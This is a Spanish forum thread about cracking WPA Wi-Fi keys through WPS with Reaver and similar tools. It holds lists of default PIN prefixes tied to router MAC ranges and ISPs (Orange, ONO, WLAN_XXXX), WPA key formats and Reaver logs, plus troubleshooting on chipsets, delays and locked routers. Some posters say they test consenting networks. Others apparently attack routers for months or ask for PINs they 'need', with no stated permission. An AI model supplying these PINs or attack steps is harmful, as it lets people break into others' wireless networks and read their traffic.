  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
  • Received M3 message
  • Sending M4 message
  • Received WSC NACK
  • Trying pin 11119999
^C
  • Session saved.


En fin....yo sólo sé que no sé nada ...:laugh:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 4 Enero 2013, 02:05 am
ASOT550: aqui un pequeño aporte de otro foro que vii lo pongo aqui para que probes haber si os sirve. ::)

ESSID: WLAN_XXXX

BSSID: 30:39:F2:XX:XX:XX

MODELO: �

V. Firm: �

Wps Activado: Si

Inicio PIN: 1670@@@@ // 4329@@@@ // 16538061* // 1340@@@@ // 8820@@@@

*pin confirmado

Código:
30:39:F2:XX:XX:XX /*ADB-Broadband*/

88202907, 16538061, 1670XXXX, 16538061, 4329XXXX, 1340XXXX, 1835XXXX, 8820XXXX, 18355604, 88202907, 1653806, 4329XXXX, 12820078, 19756967, 11967859..

essid > orangeXXXX
modelo >
versión firmware >
bssid >  50:7E:5D:XX:XX:XX
WPA> 10 caracteres hexadecimales (mayúsculas)
WPS> 4255@@@@

¡WPS activado por defecto!

Código:
50:7E:5D:XX:XX:XX  /*Orange-xxxx*/

8840XXXX, 8846XXXX..

/*La Key es de 8 carácteres en mayúscula ( A-F 0-9 ) */

Desde WPSPin Search en Android.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 4 Enero 2013, 02:21 am
 A TI  te sale con mas pin por que ? creeo que la orange-xxxx puede ser una wpa por que si fuera wpa2 tendria esta 26 caracteres verdad como ya dijimos la otra vez en las orange-xxxx me refiero.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 4 Enero 2013, 17:20 pm
Wpa o WPA2 a partir de 8 caracteres hasta los 64


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: statequieta en 4 Enero 2013, 22:49 pm
Bueno, os comento mi experiencia para que valoréis como está la situación.

Trabajo con una Alfa AWUS036H, es decir, chip rtl8187l.

Al usar reaver poniendo el pin por defecto que hay en un post de un foro (no recuerdo ya cual) en el que se indican muchos modelos con sus mac y su pin por defecto, me escupió la pass a la primera. Se trataba de una WLAN_XXXX de mi casa y lo realicé de forma educativa. El pin era el por defecto, y la pass estaba configurada por mi, con lo cual cambiada a la de por defecto.

Sin embargo, debo decir que no he tenido la misma suerte con el resto de redes... Ni vodafone, ni orange, ni ONO. Ni el WPSpin para windows, ni el WPSPIN para android. Nada. Y son ya unas cuantas las redes (siempre de amigos y vecinos con su consentimiento) con las que he probado (yo que les di la barrila con que mejorasen la seguridad y les prometí demostrarle que podría entrar en sus redes...)

Cuando no es:

Warning: Last message not processed properly, reverting state...
Warning: out of order packet received, re-trasmitting last message.

Me encuentro con un simple:

WPS transaction failed, re-trying last pin
Key cracked in x seconds
WPS PIN: "el que había puesto que me había dado el WPSPIN"
Nothing done, nothing to save.

Vamos, que nada.

¿Alguna idea de por qué?

Hay redes que efectivamente la señal no llega muy bien (-70)

Pero la mayoría de ellas he tratado en el propio salón donde estaba el router (ya digo que era en casas de amigos/vecinos que me dejaban entrar en casa a probar) con lo cual problemas de señal no es...

¿Alguna idea?¿Alguna sugerencia?

Para las conclusiones:

Wifiway 3.4, reaver 1.4, y acostumbro a lanzar la línea especificando canal, bssid, essid y essid (así como el pin si procede) nada más.

Saludos!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: pachubi en 4 Enero 2013, 23:05 pm
statequieta como se pone el pin por defecto con el reaver yo también utilizo el 1.4


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: maik78 en 9 Enero 2013, 11:31 am
Buenas,

Estoy auditando la red con WPS activada de un amigo es ONOMYZ con un BSSID A0:21:B7:XX:XM:YZ este me dice que no ha modificado nada de la ESSID, pero no se si tiene algo que ver, el caso es que no consigo el pin por defecto para esta clase de ONO.
Alguien sabe si hay algún generador de pin por defecto de ONO o sabeis el pin de esta clase de router.

Lo unico que he sacado de momento es mi red que es FTE-XXXX con wps activado lo hice con WPSPINGENERATOR.

Gracias....


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 10 Enero 2013, 00:44 am
Buenas,

Estoy auditando la red con WPS activada de un amigo es ONOMYZ con un BSSID A0:21:B7:XX:XM:YZ este me dice que no ha modificado nada de la ESSID, pero no se si tiene algo que ver, el caso es que no consigo el pin por defecto para esta clase de ONO.
Alguien sabe si hay algún generador de pin por defecto de ONO o sabeis el pin de esta clase de router.

Lo unico que he sacado de momento es mi red que es FTE-XXXX con wps activado lo hice con WPSPINGENERATOR.

Gracias....

A021B7 /*ONOXXXX*/

63825XXX, 0634XXXX, 01318104, 01874341, 6557XXXX, 0669XXXX, 5400XXXX, 1441XXXX, 15880208, 51920104, 43135479, 8067XXXX, 86559256, 33440279, 25815078, 22813503, 11352464, 47624313, 81121496, 80324560, 39149138, 41252147, 53134424, 72218013

WPA: YXXXXXXX25

ULTIMO CARACTER DEL PIN
PRIMEROS 7 CARACTERES DEL PIN

Información: WPSPinSearch (https://sourceforge.net/projects/wpspin/)



yo te recomendaría en el WPSCrackGUI usar el recuperador de sesión y ponerlo en 80% para probar nada más, pues la mayoría esta en 8XXXXXXX,



@statequieta: has probado de cambiar de placa.. pues yo con la Alfa RTL8187L no eh sacado nada.. pero con una Atheros AR9271 anda joya.. todo dependera del router.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: granbuitrenegro en 11 Enero 2013, 20:25 pm
Hola familia, soy nuevo en el foro y es mi primer post. He estado mirando por encima pero no he encontrado solución para lo que me ocurre. Estoy usando wifiway 3.4 y reaver 1.4. El wpscrackgui no me va bien y uso el reaver con los comandos. Os comento lo que me ocurre. Hago todo, y al final con el 100 % consigo el PIN y la clave WPA, coloco la clave para conectarme a la red y me da error en autentificación. Lo que hago es copiar la misma clave que me sale en pantalla.
Un saludo y gracias por vuestra ayuda.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 12 Enero 2013, 01:09 am
Hola familia, soy nuevo en el foro y es mi primer post. He estado mirando por encima pero no he encontrado solución para lo que me ocurre. Estoy usando wifiway 3.4 y reaver 1.4. El wpscrackgui no me va bien y uso el reaver con los comandos. Os comento lo que me ocurre. Hago todo, y al final con el 100 % consigo el PIN y la clave WPA, coloco la clave para conectarme a la red y me da error en autentificación. Lo que hago es copiar la misma clave que me sale en pantalla.
Un saludo y gracias por vuestra ayuda.

Lanza varias veces el ataque, hay veces que no te da la WPA sino un hash.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: granbuitrenegro en 12 Enero 2013, 10:43 am
Ok, muchas gracias, ya lo he lanzado varias veces y me sigue dando la misma clave. Seguiré probando.
Luego os cuento y os mando foto.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: granbuitrenegro en 12 Enero 2013, 10:46 am
Una pregunta @P4nd3m0n1um, ¿por qué el ping que he sacado en el reaver 1.4 lo pongo en el wpacrackgui y me dice que es erróneo? He probado en el wpacrackgui poniendo el ping entero y sólo los 4 primeros números y me dice que está mal.
Un saludo y gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: granbuitrenegro en 12 Enero 2013, 11:34 am
Aquí os pongo dos imágenes, la primera son varios ataques con reaver y me sigue dando la misma clave, lo siento por el flash

(http://imageshack.us/a/img689/4930/cam00265.jpg)

Aquí os pongo imagen de lo que os comentaba con el wpacrackgui que me dice que el ping es erróneo.

(http://imageshack.us/a/img846/4768/cam00266.jpg)

Gracias y un saludo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 12 Enero 2013, 23:55 pm
Aquí os pongo dos imágenes, la primera son varios ataques con reaver y me sigue dando la misma clave, lo siento por el flash

(http://imageshack.us/a/img689/4930/cam00265.jpg)

Aquí os pongo imagen de lo que os comentaba con el wpacrackgui que me dice que el ping es erróneo.

(http://imageshack.us/a/img846/4768/cam00266.jpg)

Gracias y un saludo.
Ami eso me paso pero en el wpscrackgui, lo que tienes que hacer es: al iniciarlo ponerlo en modo monitor, meter la mac y darle en volver a elegir, en especificar el pin poner el pin completo y le das al puntito y le das a "ataque" si te pone lo de error, cierras el ataque y le das otra vez a volver a elegir y le das al punto de especificar el pin de nuevo. Comienzas el ataque y te reconocera el pin salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: granbuitrenegro en 13 Enero 2013, 13:27 pm
Ok, muchas gracias @adrihamel , probaré a ver.
Un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: granbuitrenegro en 13 Enero 2013, 17:38 pm
Hola señores, ya está resuelto el problema, estaba confundiendo yo una O con un 0.
Agradeceros vuestra ayuda.
Un saludo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 13 Enero 2013, 19:07 pm
Bueno chicos, se que no viene mucho al tema.. Solo relacionado, pero es un detalle.

Si no os funciona walsh, (wash) hoy en dia. Tenemos un nuevo comando para saber si el AP tiene WPS ON.

"iw <interface> scan ssid (si quereis alguno especifico.)

Ejemplo: iw wlan0 scan ssid migatotienetreshuevos

 ;) , cuando hagais el scan, no hace falta modo monitor. En managed os vale. Si os devuelve una sintaxis diciendo que no se encuentra el comando (rarisimo, en Linux Mint yo lo tengo de serie y en todas las distros de auditoria  :rolleyes: )

Podeis instalarlo, con "apt-get install iw" . Pero rarisimo que no venga  ;)

Al usar el comando, os devolvera esto:

(http://img202.imageshack.us/img202/5889/wps.png)

Y ahí sabreis los resultados.  ;D

Un saludo chicos, perdon por la interrupción.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 13 Enero 2013, 19:52 pm
@HCK. Interesante dato!  ;-)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 13 Enero 2013, 23:40 pm
Bueno chicos, se que no viene mucho al tema.. Solo relacionado, pero es un detalle.

Si no os funciona walsh, (wash) hoy en dia. Tenemos un nuevo comando para saber si el AP tiene WPS ON.

"iw <interface> scan ssid (si quereis alguno especifico.)

Ejemplo: iw wlan0 scan ssid migatotienetreshuevos

 ;) , cuando hagais el scan, no hace falta modo monitor. En managed os vale. Si os devuelve una sintaxis diciendo que no se encuentra el comando (rarisimo, en Linux Mint yo lo tengo de serie y en todas las distros de auditoria  :rolleyes: )

Podeis instalarlo, con "apt-get install iw" . Pero rarisimo que no venga  ;)

Al usar el comando, os devolvera esto:

(http://img202.imageshack.us/img202/5889/wps.png)

Y ahí sabreis los resultados.  ;D

Un saludo chicos, perdon por la interrupción.
El walsh (wash) si lo ejecutas por comando, ami ni en wifiway, ni en backtrack, ni en wifislax me ha funcionado, pero si que me ha funcionado con el wpscrackgui 2.0 si mal no recuerdo (viene el ultimo instalado en el wifislax 4.3) y te salen las redes con el wps activado y bloqueado salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 14 Enero 2013, 00:29 am
Nunca use la gui . No me va las interfaces graficas, no se.. Lo veo mas bonito desde una terminal, llamadme raro si qereis  :P Siempre por comando y nunca me funcionó  :-\. Lo he usado en varios tipos de chips y nada :( , el AR9271, RT3070L , RLT8187l.. Busque alguna alternativa y bueno. Va bien, yo la puse por si os sirve de utilidad ^^ jeje


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 14 Enero 2013, 00:55 am
Hola buenas me gustaria saber si el pin que pone arriba granbuitrenegro si me lo puedes confirmar es correcto y sacaste esa clave con ese pin resulta que yo tengo una misma red con esa mac igual menos los ultimos numero que cambia lo que me extraña de esa clave wpa es que todas sean mayusculas y no haya ninguna minuscula sera por que son nuevas verdad y ese comando que le has metido por que le pones 15 no lo entiendo si alguien me lo explica.saludos.


 HCK: Perdona con el Wireshark en el wifislax4.3 o en cualquier version tambien se puede ver si tiene el wps activado verdad dandole a parametro esa opcion que tu has puesto hay de que programa es es mas o menos lo mismo que yo digo?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 14 Enero 2013, 01:17 am
El walsh (wash) si lo ejecutas por comando, ami ni en wifiway, ni en backtrack, ni en wifislax me ha funcionado, pero si que me ha funcionado con el wpscrackgui 2.0 si mal no recuerdo (viene el ultimo instalado en el wifislax 4.3) y te salen las redes con el wps activado y bloqueado salu2

Ante ultimo, el 1.2.0 sera.  :laugh: :laugh:



Hola buenas me gustaria saber si el pin que pone arriba granbuitrenegro si me lo puedes confirmar es correcto y sacaste esa clave con ese pin resulta que yo tengo una misma red con esa mac igual menos los ultimos numero que cambia lo que me extraña de esa clave wpa es que todas sean mayusculas y no haya ninguna minuscula sera por que son nuevas verdad y ese comando que le has metido por que le pones 15 no lo entiendo si alguien me lo explica.saludos.

es el delay, cuanto tiempo teja entre pin y pin. Hay que leer el help:

Código:
reaver --help



HCK: Perdona con el Wireshark en el wifislax4.3 o en cualquier version tambien se puede ver si tiene el wps activado verdad dandole a parametro esa opcion que tu has puesto hay de que programa es es mas o menos lo mismo que yo digo?

Es mal gastar el Wireshark.. esta echo pa otras cosas..



Cambiando de tema, alguien tiene algún dato sobre alguna ZTE... en particular el ZTE ZXV10 H108L... viene con WPS Activo por defecto pero ni el fabricante te dice cual es el WPS y ni por consola puedes entrar para verlo como algún que otro Thomson, lo bueno es que se bloquea por 5 días tras 10 pines.. si alguien tiene algún dato.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 14 Enero 2013, 01:39 am
El delay no entiendo siempre se le pone 15 contra mas le ponga que pasa, haber se supone que es el pin que ha soltado con el reaber verdad ese pin me puede vale para mi mac DC:AE:EC:EE:E6:A0 ES MUY PARECIDA a la de arriba solo que cambia los ultimos numero logicamente  ;D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 14 Enero 2013, 01:51 am


 HCK: Perdona con el Wireshark en el wifislax4.3 o en cualquier version tambien se puede ver si tiene el wps activado verdad dandole a parametro esa opcion que tu has puesto hay de que programa es es mas o menos lo mismo que yo digo?

Si, es cierto. Pero ya tienes que capturar algun #data, analizarlo... Con este tipo de cosas te ahorras todo eso, que es un engorro.. Ademas, wireshark tiene mas usos mucho mas utiles, como dice el compañero :) .

Un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 14 Enero 2013, 02:06 am
HCK: Entonce esa imagen que tu has puesto de que programa es ? Gracias por responder. ;D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 14 Enero 2013, 02:23 am
HCK: Entonce esa imagen que tu has puesto de que programa es ? Gracias por responder. ;D

ajjaja lo que es no tener noción de nada.. el iw es una utilidad de configuración basada en CLI para dispositivos inalámbricos. Es compatible con casi todos los nuevos semiconductores que se han agregado al kernel recientemente de linux.

iw está todavía en desarrollo. Las características se añaden "a medida que van avanzado". La única documentación que existe para iw es esta página (http://wireless.kernel.org/en/users/Documentation/iw).

Es también una herramienta muy similar al iwconfig. Por lo general ya viene instalado en los kernels y si no viene para usar aircrack-ng debes tenerlo instalado.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 14 Enero 2013, 02:40 am
ES normal que no lo sepa como no Utilizo linux solo los programas desde windows7 y boteado normal que no me sonara esas opciones solo en el wereshar como dije antes iwconfig eso lo lleva en el wifislax 4.3 creo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 14 Enero 2013, 02:52 am
ES normal que no lo sepa como no Utilizo linux solo los programas desde windows7 y boteado normal que no me sonara esas opciones solo en el wereshar como dije antes iwconfig eso lo lleva en el wifislax 4.3 creo.

En cualquier linux esta.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: juanminauta en 18 Enero 2013, 01:12 am
Bueno perdonar mi ignoracia, pero estoy intentando aprender un poco sobre el tema, y hasta el momento he conseguido que a traves del inflator empieze a ejecutarse y a comprobar la secuencia de numeros e incluso ha ido a vanzando el porcentaje,  el problema que tengo es que cuando lo dejo solo durante un buen rato y la pantalla del portatil entra en suspensión de forma que se apaga y luego no consiguo volver a hacer que se active de forma que siempre permanece en negro, motivo por el cuan no me permite mada mas que llegar al un 0,30% mas o menos por lo que no puedo  avanzar, si muevo el raton o el teclado no entra el modo de suspension, pero tampoco es cuestion de tirarme 30horas moviendo el raton cada 10 mnutos, he probado con varias versiones del xiaopan, he leido muchos foros peo no encuentro nada al respecto.
Deciros que el xiaopan lo arranco desde un USB no desde una virtualización por lo tanto las propiedades de ahorro de energia de windows no tienen nada que ver.
agradeceria cualquier orientacion o ayuda.
Gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 18 Enero 2013, 14:58 pm
Bueno perdonar mi ignoracia, pero estoy intentando aprender un poco sobre el tema, y hasta el momento he conseguido que a traves del inflator empieze a ejecutarse y a comprobar la secuencia de numeros e incluso ha ido a vanzando el porcentaje,  el problema que tengo es que cuando lo dejo solo durante un buen rato y la pantalla del portatil entra en suspensión de forma que se apaga y luego no consiguo volver a hacer que se active de forma que siempre permanece en negro, motivo por el cuan no me permite mada mas que llegar al un 0,30% mas o menos por lo que no puedo  avanzar, si muevo el raton o el teclado no entra el modo de suspension, pero tampoco es cuestion de tirarme 30horas moviendo el raton cada 10 mnutos, he probado con varias versiones del xiaopan, he leido muchos foros peo no encuentro nada al respecto.
Deciros que el xiaopan lo arranco desde un USB no desde una virtualización por lo tanto las propiedades de ahorro de energia de windows no tienen nada que ver.
agradeceria cualquier orientacion o ayuda.
Gracias.
Yo uso wifislax 4.3 y lo utilizo en un portatil lenovo X1 y a veces la pantalla se pone negra pero sigue trabajando. Y al final consigo la clave sin necesidad de tocar el touch cada x tiempo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 18 Enero 2013, 15:05 pm
Una pregunta, los routers de vodafoneXXXX siendo la v en minuscula, cuanto tiempo tardan en desbloquearse? porque inicie el ataque hace ya mas de dos meses y a dia de hoy sigue bloqueado y me pasa con dos de vodafone una con mac 5c:4c:a9 y la otra 20:2b:c1 y llevan ya mas de mes y medio bloqueadas. A alquien le pasa esto? como se puede desbloquear un router? porque los 4 primeros pines ya los tengo me falta solo la clave salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 19 Enero 2013, 02:06 am
Una pregunta, los routers de vodafoneXXXX siendo la v en minuscula, cuanto tiempo tardan en desbloquearse? porque inicie el ataque hace ya mas de dos meses y a dia de hoy sigue bloqueado y me pasa con dos de vodafone una con mac 5c:4c:a9 y la otra 20:2b:c1 y llevan ya mas de mes y medio bloqueadas. A alquien le pasa esto? como se puede desbloquear un router? porque los 4 primeros pines ya los tengo me falta solo la clave salu2

Teniendo los primeros 4 calcula que el ataque normal es de 4 horas para saber los siguientes como mínimo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: juanminauta en 19 Enero 2013, 09:58 am
Yo uso wifislax 4.3 y lo utilizo en un portatil lenovo X1 y a veces la pantalla se pone negra pero sigue trabajando. Y al final consigo la clave sin necesidad de tocar el touch cada x tiempo
gracias probare con esa distribucion a ver que tal.
un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 20 Enero 2013, 14:30 pm
Decidme, si alguno de vosotros. Ha conseguido finalmente sacar una clave con el chipset RT3070. Por curiosidad, porque al hacer el ataque de varios tipos, he conseguido que asocie alguna vez, y estando a 50 de PWR. Osea, al lado de mi propio router casi. Porque con otros se me hace imposible con ese chip. Y al asociar, el segundo intento me tira fallo en la asociación. Y asi todos. Se que pone en la primera pag del post que no es compatible. Pero queria saber, si lo habeis probado, como fue vuestra experiencia.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 20 Enero 2013, 18:10 pm
Decidme, si alguno de vosotros. Ha conseguido finalmente sacar una clave con el chipset RT3070. Por curiosidad, porque al hacer el ataque de varios tipos, he conseguido que asocie alguna vez, y estando a 50 de PWR. Osea, al lado de mi propio router casi. Porque con otros se me hace imposible con ese chip. Y al asociar, el segundo intento me tira fallo en la asociación. Y asi todos. Se que pone en la primera pag del post que no es compatible. Pero queria saber, si lo habeis probado, como fue vuestra experiencia.

El problema de ese controlador es que todo es genérico, Ralink en ves de desarrollar como Realtek por ejemplo un Driver para cada chipset, realiza un driver para todos los chipset y mientras que ande listo... en cambio para nosotros eso es una porquería.. en si para decir que es compatible el Chipset al menos tiene que trabajar sin lanzar ningún error..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: heaviloto en 21 Enero 2013, 15:03 pm
Decidme, si alguno de vosotros. Ha conseguido finalmente sacar una clave con el chipset RT3070. Por curiosidad, porque al hacer el ataque de varios tipos, he conseguido que asocie alguna vez, y estando a 50 de PWR. Osea, al lado de mi propio router casi. Porque con otros se me hace imposible con ese chip. Y al asociar, el segundo intento me tira fallo en la asociación. Y asi todos. Se que pone en la primera pag del post que no es compatible. Pero queria saber, si lo habeis probado, como fue vuestra experiencia.

Hola.

Pues la verdad, es que yo e sacado varias, si que me a dado fallos de asociacion pero tambien me los a dado en las mismas el rtl8187. De hecho se le a cambiado la clave a una varias veces y siempre me la a dado

un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 21 Enero 2013, 22:58 pm
Con wifislax 4 sí que he sacado alguna...soporta ralink 3070,rt 2800,rt 2870....entre otros.
La antena usada es una BLUEWAY BY-BT030 que me regalaron....un disparo navegando,por cierto...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sucabezas en 22 Enero 2013, 19:04 pm
A mi me sale
WARNING: Failed to associate with (MAC)(ESSID)
todo el rato eso, eso quiere decir que intenta asociarse hasta que lo consiga, o voy mal


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 22 Enero 2013, 22:55 pm
Con wifislax 4 sí que he sacado alguna...soporta ralink 3070,rt 2800,rt 2870....entre otros.
La antena usada es una BLUEWAY BY-BT030 que me regalaron....un disparo navegando,por cierto...

Lo probaré. De todas maneras, si es cosa del driver. Vendran todas las distros con el mismo, por lo menos las versiones de 2012 para arriba. Puesto que el RT3070 ya es conocido, aunque en backtrack en la info de airmon-ng tira datos de RT2870/3070, en la de Linux Mint es directamente rt2800usb.

Lo bajo y lo pruebo ahí, haber que tal ::)

A mi me sale
WARNING: Failed to associate with (MAC)(ESSID)
todo el rato eso, eso quiere decir que intenta asociarse hasta que lo consiga, o voy mal



Estas lejos del AP.. El chip no es totalmente compatible.. Puede ser por varios motivos.

Un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: warcry. en 22 Enero 2013, 23:04 pm
Lo probaré. De todas maneras, si es cosa del driver. Vendran todas las distros con el mismo, por lo menos las versiones de 2012 para arriba. Puesto que el RT3070 ya es conocido, aunque en backtrack en la info de airmon-ng tira datos de RT2870/3070, en la de Linux Mint es directamente rt2800usb.

Lo bajo y lo pruebo ahí, haber que tal ::)



Estas lejos del AP.. El chip no es totalmente compatible.. Puede ser por varios motivos.

Un saludo

no todas las distrubuciones tienen los mismos drivers, depende mucho de los kernels que monten y del soporte hardware que den.

wifislax 4.3 monta el kernel 3.5.7 eol, mientras que backtrack no se ha movido de la rama kernel 3.2 en sus ultimas distribuciones.

y ya van por el kernel 3.8 rc y por cierto que no es compatible con la suit aircrack, y los de aircrack llevan un mes parados sin sacar ninguna actualizacion, no pinta bien la cosa  :¬¬


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 23 Enero 2013, 00:01 am
no todas las distrubuciones tienen los mismos drivers, depende mucho de los kernels que monten y del soporte hardware que den.

wifislax 4.3 monta el kernel 3.5.7 eol, mientras que backtrack no se ha movido de la rama kernel 3.2 en sus ultimas distribuciones.

y ya van por el kernel 3.8 rc y por cierto que no es compatible con la suit aircrack, y los de aircrack llevan un mes parados sin sacar ninguna actualizacion, no pinta bien la cosa  :¬¬

Ums, y Wifiway 3.4 que kernel porta?, haciendo memoria creo que ahí lo hice funcionar una vez :) .

Esta bien saberlo, me estoy metiendo mucho mas en Linux, y las cosas basicas como compilar, instalar, actualizar, y demas las he aprendido en un dia. Pero todavia no me apaño en esos temas de drivers, y los kernel. Gracias por aclararme la duda  :P

Bueno, todo será esperar. Si ya se alarga un cacho más, será preocupante. Con cada que frecuencia actualizan normalmente?, porque no estoy muy enterado de eso tampoco :( .

Gracias





Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: warcry. en 23 Enero 2013, 00:17 am
para conocer la version del kernel de wifiway teclea en una shell

uname -r

luego, hay que tener en cuenta que no todo depende del chipset, ya que luego el fabricante también interviene en el proceso.

el chipset puede ser cojonudo, pero si va montado en una p.uta mier.da de placa la cual no gestiona correctamente las capacidades del chipset pues vamos apañados.

te hago un simil con las tarjetas gráficas.

el chipset amd hd 7870 lo montan muchos fabricantes, pero no es lo mismo asus que shappire o que gigabyte.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 23 Enero 2013, 12:31 pm
poco importa que los de aircrack no hayan sacado nada en un mes....(a estas alturas,a riesgo de equivocarme,en cualquier linux-debian no habría problemas para instalárselo vía wget o similares)..ya que puedes instalarlo perfectamente...en xubuntu 10 no viene aircrack,ni reaver,ni wpspin,ni wlandecrypter,ni wepattack,ni wifite...etc,etc,etc...lo cual no es impedimento para instalarlas y usarlas,satisfaciendo correctamentye las dependencias y librerías de las que tiran estos programas.
Otra cosa distinta es el tipo de antena a emplear....las que se salen de realtek ó atheros suelen dar problemas o hay que buscar parches...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: warcry. en 23 Enero 2013, 16:28 pm
poco importa que los de aircrack no hayan sacado nada en un mes....(a estas alturas,a riesgo de equivocarme,en cualquier linux-debian no habría problemas para instalárselo vía wget o similares)..ya que puedes instalarlo perfectamente...en xubuntu 10 no viene aircrack,ni reaver,ni wpspin,ni wlandecrypter,ni wepattack,ni wifite...etc,etc,etc...lo cual no es impedimento para instalarlas y usarlas,satisfaciendo correctamentye las dependencias y librerías de las que tiran estos programas.
Otra cosa distinta es el tipo de antena a emplear....las que se salen de realtek ó atheros suelen dar problemas o hay que buscar parches...

no voy por ahi, tu puedes instalar lo que te de la gana, pero me gustaria ver como funciona satisfactoriamente algunos elementos de aircrack en kernel superiores a 3.6 pero tampoco profundizare mucho mas ya que el curro que se esta pegando un compi, es impresionante y si quiere publicar el sus conclusiones para que sirvan a otros, yo no voy a ser el que destape el pastel.

pero como digo, ninguna suit de auditorias, monta kernel superior al 3.6 y la movida es peor de lo que parece  :¬¬ :¬¬ :¬¬

PD:perdon por deribar el tema, es que a veces me pongo hablar de mi libro y no paro  ;D ;D ;D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: canariobreaker en 24 Enero 2013, 10:57 am
El hilo de este tema es bastante grande, solo me gustaría saber si reaver 1.4 es compatible con el chip RAILINK 3072. repito 3072 no el 3070 porque este último va fenomenal. Muchas gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: iscle en 24 Enero 2013, 13:26 pm
al final alguien ha encontrado el pin wps de las WLAN_XXXX que tienen MAC: D0:AE:EC ??

Esque lo necesito, si me decis el modelo del router a lo mejor os lo puedo conseguir yo...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 26 Enero 2013, 00:12 am
al final alguien ha encontrado el pin wps de las WLAN_XXXX que tienen MAC: D0:AE:EC ??

Esque lo necesito, si me decis el modelo del router a lo mejor os lo puedo conseguir yo...
Yo he descifrado una red con mac D0:AE:EC y los 4 primeros pines de esta red son 0623 salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: alister en 26 Enero 2013, 00:17 am
El hilo de este tema es bastante grande, solo me gustaría saber si reaver 1.4 es compatible con el chip RAILINK 3072. repito 3072 no el 3070 porque este último va fenomenal. Muchas gracias.

depende del kernel, no de reaver.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: canariobreaker en 26 Enero 2013, 15:24 pm
Gracias por la contestacion, yo no se que kernel utilizo yo lo que hago es que arranco desde un cd live el wifi slax 4 3 pero da igual me voy a comprar la alfa negra que me han dicho que el chip atheros que lleva le a de lujo, alguien me aconseja otra ¿? la blanca? o la negra gracias


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: alister en 26 Enero 2013, 15:52 pm
Gracias por la contestacion, yo no se que kernel utilizo yo lo que hago es que arranco desde un cd live el wifi slax 4 3 pero da igual me voy a comprar la alfa negra que me han dicho que el chip atheros que lleva le a de lujo, alguien me aconseja otra ¿? la blanca? o la negra gracias

en wifislax y wifiway siempre hemos hecho todo lo posible para dar el maxximo soporte a todos los adaptadores wireless, ya que es el componente clave para estos temas.

sin embago, de memoria, no recuerdo cómo estaba el soporte para este adaptador en particular. hace un tiempo que no me encargo del kernel de las distribuciones de la casa. pero hay parte del staff por aqui que tendrá información mas fresca que yo! :)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 26 Enero 2013, 23:35 pm
